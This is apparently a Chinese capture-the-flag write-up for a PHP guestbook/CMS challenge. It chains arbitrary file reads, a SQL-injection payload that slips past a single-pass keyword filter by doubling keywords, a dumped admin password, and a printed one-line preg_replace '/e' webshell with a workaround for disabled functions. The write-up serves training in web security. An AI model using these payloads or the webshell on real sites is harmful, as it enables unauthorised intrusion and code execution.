题目地址 :
http://cms.nuptzj.cn

查看源码发现 :

image.png

似乎是个任意文件下载

http://cms.nuptzj.cn/about.php?file=so.php

image.png

可以注入 , 只要不使用单引号 , 双引号这些会被 mysql_real_escape_string 这个函数过滤掉的字符即可

之前对用户输入还调用了 antiinject 这个函数进行过滤

通过任意文件读取漏洞读到该函数的源码

antiinject.php

<?php
function antiinject($content){
    $keyword=array('select','union','and','from',' ',''',';',''','char','or','count','master','name','pass','admin','+','-','order','=');
    $info=strtolower($content);
    for($i=0;$i<=count($keyword);$i++){
     $info=str_replace($keyword[$i], '',$info);
    }
    return $info;
}
?>

把 union/select 等关键字替换成空了 , 但是只替换了一次 , 那么 seselectlect 这样就可以绕过
所以 Payload 如下 :

image.png

soid=1/**/ununionion/**/seleselectct/**/1,2,3,4/**/limit/**/1,1

表名 : 
admin
    username
    userpass
        admin, 102 117 99 107 114 117 110 116 117
filename
    id
    path
        1,compass.php
        2,arlogined.php
hackerip
message
    say
    nice

image.png

拿到后台用户名和密码 :

admin/fuckruntu

image.png

在这里拿到后台地址 :

http://cms.nuptzj.cn/loginxlcteam/index.php

image.png

image.png

再读一下小马的源码 , 发现是 php 的 preg_replace 后门 , 利用即可

<?php
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?>

http://php.net/manual/zh/function.array-walk.php

image.png

但是似乎禁用了很多函数 :

image.png

symlink
link
exec
system
escapeshellcmd
escapeshellarg
passthru
shell_exec
proc_open
proc_close
proc_terminate
proc_get_status
proc_nice
dl
pclose
popen
stream_socket_server
stream_socket_accept
stream_socket_pair
stream_wrapper_restore
mail
mb_send_mail
posix_kill
apache_child_terminate
apache_lookup_uri
apache_reset_timeout
apache_setenv
virtual
socket_create
socket_create_pair
realpath_cache_get
opcache_compile_file
opcache_get_configuration
opcache_get_status
opcache_invalidate
opcache_is_script_cached
opcache_reset   symlink
link
exec
system
escapeshellcmd
escapeshellarg
passthru
shell_exec
proc_open
proc_close
proc_terminate
proc_get_status
proc_nice
dl
pclose
popen
stream_socket_server
stream_socket_accept
stream_socket_pair
stream_wrapper_restore
mail
mb_send_mail
posix_kill
apache_child_terminate
apache_lookup_uri
apache_reset_timeout
apache_setenv
virtual
socket_create
socket_create_pair
realpath_cache_get
opcache_compile_file
opcache_get_configuration
opcache_get_status
opcache_invalidate
opcache_is_script_cached
opcache_reset

只能手动来绕过被禁用的函数拿到 flag 了
参考文章 :

http://www.jianshu.com/p/33bc37ef72cc

image.png

Array
(
    [0] => .
    [1] => ..
    [2] => about.php
    [3] => antiinject.php
    [4] => antixss.php
    [5] => config.php
    [6] => index.php
    [7] => list.php
    [8] => loginxlcteam
    [9] => passencode.php
    [10] => preview.php
    [11] => say.php
    [12] => sm.txt
    [13] => so.php
    [14] => xlcteam.php
    [15] => 恭喜你获得flag2.txt
)

Array
(
    [0] => .
    [1] => ..
    [2] => arlogined.php
    [3] => conpass.php
    [4] => index.php
)

image.png

继续利用 file_get_contents

image.png

<?php
//后台登陆
include './../config.php';
include './../passencode.php';
session_start();
$username=$_POST['username'];
$userpass=$_POST['userpass'];
if($username=="" || $userpass==""){
echo "<script>alert('用户名或密码不能为空！');window.location = './index.php'</script>";
exit();
}
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库！！".mysql_error());
mysql_select_db($db_name,$con);
$username=mysql_real_escape_string($username);
$userpass=passencode($userpass);

$result=mysql_query("SELECT * FROM admin WHERE username='$username'",$con);
//知道我写这个存在漏洞的密码验证算法浪费了多少时间么？！ 哭~
if(mysql_num_rows($result)<=0){
echo "<script>alert('用户名不存在');window.location = './index.php'</script>";
mysql_free_result($result);
mysql_close($con);
exit();
}

while($rs=mysql_fetch_array($result)){
if($rs['username']==$username){
if(strlen($userpass)!=strlen($rs['userpass'])){
echo "<script>alert('密码错误：长度不一致！');window.location = './index.php'</script>";
mysql_free_result($result);
mysql_close($con);
exit();
}
}
for($i=0;$i<=strlen($userpass);++$i){
if(strncmp($userpass,$rs['userpass'],$i)!=0){
echo "<script>alert('密码错误：比较第 $i 位错误！');window.location = './index.php'</script>";
break;
}else{
if($i==strlen($userpass)){
$_SESSION['state']="已登录";
setcookie('username','');
setcookie('userpass','');
setcookie('username',"$username",time()+1200,"/");
setcookie('userpass',"$userpass",time()+1200,"/");
$file=mysql_query("SELECT * FROM filename where id=2");
$path=mysql_fetch_array($file);
echo "<script>window.location = '".$path['path']."'</script>";
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
exit();
}
}
}
mysql_free_result($result);
mysql_close($con);
}
?>

<?php
session_start();
if(!isset($_SESSION['state'])){
echo "<script>alert('请先登陆！');window.location = './index.php'</script>";
exit();
}else{
if($_SESSION['state']!="已登录"){
echo "<script>alert('请先登陆！');window.location = './index.php'</script>";
exit();
}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Xlcteam留言板系统后台</title>
</head>

<body>
<center>
    <h1>恭喜你已拿下后台，离爆菊只差一步了flag1:nctf{}</h1>
  <p>&nbsp;</p>
  <hr />
  <h3>能来到这里，相信也不是只会用工具的脚本小子了</h3>
  <h3>现在离爆菊只差一步了</h3>
  <hr />
  <h3>因为程序猿连后台都懒得开发了，为了方便管理，他邪恶地放了一个一句话木马在网站的根目录下<br />
    小马的文件名为：xlcteam.php
        <?php /*
        include './../config.php';
        $con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库！！".mysql_error());
    mysql_select_db($db_name,$con);
    mysql_query("set names gb2312");
        $file=mysql_query("SELECT * FROM filename where id=3");
    $filename=mysql_fetch_array($file);
        echo $filename['name'];*/
        ?>
         </h3>
        <hr />
        <h4>黑阔，哎哟~不错哦
    </h4>
</center>
</body>
</html>